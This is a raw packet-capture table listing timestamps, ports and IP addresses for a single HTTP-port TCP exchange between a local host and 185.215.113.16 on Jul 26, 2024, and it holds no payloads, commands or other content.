Jul 26, 2024 17:56:21.168133020 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.176378012 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176387072 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176397085 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176444054 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.176475048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176491976 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176501989 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176512003 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176547050 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.176580906 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.176621914 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176632881 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176642895 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176667929 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.176667929 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176692009 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176714897 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176717043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.176717043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.176765919 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.176765919 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.176964998 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176975965 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.176990986 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.177000999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.177016973 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.177023888 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.177045107 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.177047014 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.177068949 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.177078962 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.177097082 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.177097082 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.177098036 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.177146912 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.177146912 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184075117 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184084892 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184096098 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184144974 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184145927 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184155941 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184165955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184176922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184194088 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184216976 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184230089 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184389114 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184397936 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184406996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184417009 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184433937 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184438944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184442997 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184444904 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184454918 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184464931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184497118 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184497118 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184524059 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184585094 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184655905 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184717894 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184729099 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184737921 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184746981 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184757948 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184765100 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184767008 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184782028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184792042 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184803009 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184806108 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184806108 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184812069 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184818029 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184824944 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184827089 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184834957 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184844017 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184851885 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184855938 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184866905 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.184890985 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.184902906 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.185193062 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.185261011 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.185285091 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.185296059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.185305119 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.185314894 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.185324907 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.185333967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.185338974 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.185369015 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.276088953 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.276159048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.276170969 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.276196003 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.276196003 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.276272058 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.276274920 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.276285887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.276290894 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.276349068 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.277585983 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.277657986 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279158115 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279169083 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279181004 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279194117 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279203892 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279213905 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279217958 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279226065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279319048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279335022 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279346943 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279356956 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279373884 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279376030 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279376030 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279385090 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279395103 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279401064 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279405117 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279416084 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279426098 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279437065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279438972 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279438972 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279445887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279455900 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279472113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279484987 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279490948 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279490948 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279495955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279506922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279516935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279527903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279537916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279537916 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279537916 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279550076 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279560089 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279561043 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279572010 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279582977 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279584885 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279593945 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279606104 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279617071 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279628038 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.279660940 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279660940 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.279660940 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280659914 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280670881 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280680895 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280693054 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280703068 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280710936 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280711889 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280723095 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280733109 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280744076 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280752897 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280760050 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280760050 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280777931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280786991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280791044 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280791044 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280797958 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280817986 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280827999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280838966 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280838966 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280844927 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280854940 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280865908 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280878067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280881882 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280881882 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280889034 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280899048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280910015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280921936 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280931950 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280934095 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280934095 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280941963 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280953884 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280963898 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280963898 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280975103 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280982971 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280982971 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.280987024 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.280998945 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281008959 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281021118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281030893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281039953 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281039953 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281043053 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281070948 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281070948 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281094074 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281275988 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281286955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281297922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281302929 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281307936 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281318903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281336069 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281347036 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281358004 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281363010 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281363010 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281368017 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281380892 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281392097 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281399965 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281399965 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281403065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281414032 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281419039 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281424999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281439066 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281466961 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281466961 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281472921 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281482935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281492949 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281505108 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281511068 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281511068 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281517982 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281527996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281564951 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281564951 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281599045 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281610012 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281619072 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281630039 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281640053 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281651974 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281662941 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281672001 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281672001 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281672955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281687021 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281697035 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.281716108 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281716108 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.281747103 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.352874041 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.352899075 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.352910042 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.352941036 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353028059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353039026 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353058100 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353070021 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353080034 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353091002 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353091002 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353147030 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353156090 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353156090 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353159904 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353228092 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353240967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353255033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353255033 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353269100 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353275061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353319883 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353319883 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353435993 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353447914 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353461027 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353471994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353485107 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353496075 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353507996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353517056 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353517056 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353554010 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353554010 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353562117 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353614092 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353625059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353635073 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353637934 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353677034 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353677034 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353770018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353781939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353792906 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353805065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353816032 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353817940 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353828907 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353840113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.353859901 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.353859901 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.354053020 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354062080 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354073048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354083061 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354089975 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.354089975 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.354094028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354104996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354115963 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354130983 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354141951 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354142904 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.354142904 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.354186058 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.354186058 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.354347944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354379892 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354391098 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354402065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354413033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354424000 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354434967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.354439020 CEST	49705	80	192.168.2.5	185.215.113.16
